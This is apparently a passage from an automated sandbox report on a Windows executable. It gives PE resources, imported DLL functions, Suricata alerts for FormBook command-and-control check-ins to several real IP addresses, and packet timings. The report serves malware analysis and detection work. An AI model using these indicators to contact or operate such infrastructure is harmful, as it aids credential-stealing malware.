.reloc	0x125000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x5471d	data			1.0003353715830405
RT_GROUP_ICON	0x123ed8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x123f50	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x123f64	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x123f78	0x14	data	English	Great Britain	1.25
RT_VERSION	0x123f8c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x124068	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T19:56:03.569533+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49711	199.59.243.228	80	TCP
2025-01-10T19:56:03.569533+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49711	199.59.243.228	80	TCP
2025-01-10T19:56:20.061725+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49712	18.139.62.226	80	TCP
2025-01-10T19:56:22.609544+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49714	18.139.62.226	80	TCP
2025-01-10T19:56:25.171695+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49730	18.139.62.226	80	TCP
2025-01-10T19:56:27.728275+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49747	18.139.62.226	80	TCP
2025-01-10T19:56:27.728275+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49747	18.139.62.226	80	TCP
2025-01-10T19:56:33.609278+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49791	199.59.243.228	80	TCP
2025-01-10T19:56:36.194568+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49805	199.59.243.228	80	TCP
2025-01-10T19:56:38.721908+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49824	199.59.243.228	80	TCP
2025-01-10T19:56:41.276506+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49839	199.59.243.228	80	TCP
2025-01-10T19:56:41.276506+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49839	199.59.243.228	80	TCP
2025-01-10T19:56:47.422765+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49874	146.88.233.115	80	TCP
2025-01-10T19:56:49.756272+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49889	146.88.233.115	80	TCP
2025-01-10T19:56:52.298153+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49905	146.88.233.115	80	TCP
2025-01-10T19:56:54.818589+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49923	146.88.233.115	80	TCP
2025-01-10T19:56:54.818589+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49923	146.88.233.115	80	TCP
2025-01-10T19:57:01.725338+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49960	85.159.66.93	80	TCP
2025-01-10T19:57:04.287916+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49976	85.159.66.93	80	TCP
2025-01-10T19:57:06.834861+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49992	85.159.66.93	80	TCP
2025-01-10T19:57:08.580825+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49995	85.159.66.93	80	TCP
2025-01-10T19:57:08.580825+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49995	85.159.66.93	80	TCP
2025-01-10T19:57:15.096105+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49996	104.21.7.187	80	TCP
2025-01-10T19:57:17.679275+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49997	104.21.7.187	80	TCP
2025-01-10T19:57:20.214853+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49998	104.21.7.187	80	TCP
2025-01-10T19:57:22.797035+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49999	104.21.7.187	80	TCP
2025-01-10T19:57:22.797035+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49999	104.21.7.187	80	TCP
2025-01-10T19:57:28.298910+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50000	13.248.169.48	80	TCP
2025-01-10T19:57:30.842191+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50001	13.248.169.48	80	TCP
2025-01-10T19:57:33.545530+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50002	13.248.169.48	80	TCP
2025-01-10T19:57:45.033632+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	50003	13.248.169.48	80	TCP
2025-01-10T19:57:45.033632+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50003	13.248.169.48	80	TCP
2025-01-10T19:57:50.908441+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50004	162.0.213.94	80	TCP
2025-01-10T19:57:53.560247+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50005	162.0.213.94	80	TCP
2025-01-10T19:57:55.982741+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50006	162.0.213.94	80	TCP
2025-01-10T19:57:58.813636+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	50007	162.0.213.94	80	TCP
2025-01-10T19:57:58.813636+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50007	162.0.213.94	80	TCP
2025-01-10T19:58:04.416939+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50008	3.33.130.190	80	TCP
2025-01-10T19:58:06.985490+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50009	3.33.130.190	80	TCP
2025-01-10T19:58:09.541594+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50010	3.33.130.190	80	TCP
2025-01-10T19:58:12.200671+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	50011	3.33.130.190	80	TCP
2025-01-10T19:58:12.200671+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50011	3.33.130.190	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:56:03.027724028 CET	49711	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:03.032628059 CET	80	49711	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:03.032748938 CET	49711	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:03.043490887 CET	49711	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:03.048865080 CET	80	49711	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:03.569308996 CET	80	49711	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:03.569338083 CET	80	49711	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:03.569364071 CET	80	49711	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:03.569533110 CET	49711	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:03.569768906 CET	49711	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:03.572994947 CET	49711	80	192.168.2.8	199.59.243.228
Jan 10, 2025 19:56:03.577804089 CET	80	49711	199.59.243.228	192.168.2.8
Jan 10, 2025 19:56:19.066865921 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:19.071679115 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:19.073153973 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:19.099509001 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:19.104300022 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.061613083 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.061631918 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.061644077 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.061655045 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.061666012 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.061680079 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.061724901 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:20.061774969 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:20.062278986 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.062294006 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.062305927 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.062342882 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:20.062478065 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.062539101 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:20.062695980 CET	80	49712	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:20.062747955 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:20.616106987 CET	49712	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:21.635232925 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:21.640402079 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:21.644133091 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:21.657421112 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:21.662208080 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609428883 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609502077 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609513044 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609544039 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:22.609561920 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609601021 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:22.609800100 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609858990 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609869957 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609882116 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609894037 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.609895945 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:22.609930038 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:22.610048056 CET	80	49714	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:22.610093117 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:23.162858009 CET	49714	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:24.182192087 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:24.187155008 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:24.187287092 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:24.204663038 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:24.209486008 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:24.209676027 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171396971 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171438932 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171477079 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171514034 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171549082 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171694994 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:25.171694994 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:25.171727896 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171765089 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171799898 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171834946 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171849012 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:25.171849966 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:25.171857119 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.171976089 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:25.172200918 CET	80	49730	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:25.172421932 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:25.709868908 CET	49730	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:26.729218006 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:26.734078884 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:26.734157085 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:26.743978977 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:26.748796940 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.727960110 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.727976084 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728033066 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728080988 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728090048 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728106976 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728117943 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728127956 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728137970 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728148937 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.728275061 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.728276014 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.733093977 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.733144045 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.733155012 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.733165979 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.733194113 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.733246088 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.733421087 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.787961960 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.989608049 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989626884 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989648104 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989712954 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989725113 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989737034 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989748955 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989754915 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.989823103 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.989882946 CET	49747	80	192.168.2.8	18.139.62.226
Jan 10, 2025 19:56:27.990485907 CET	80	49747	18.139.62.226	192.168.2.8
Jan 10, 2025 19:56:27.990515947 CET	80	49747	18.139.62.226	192.168.2.8
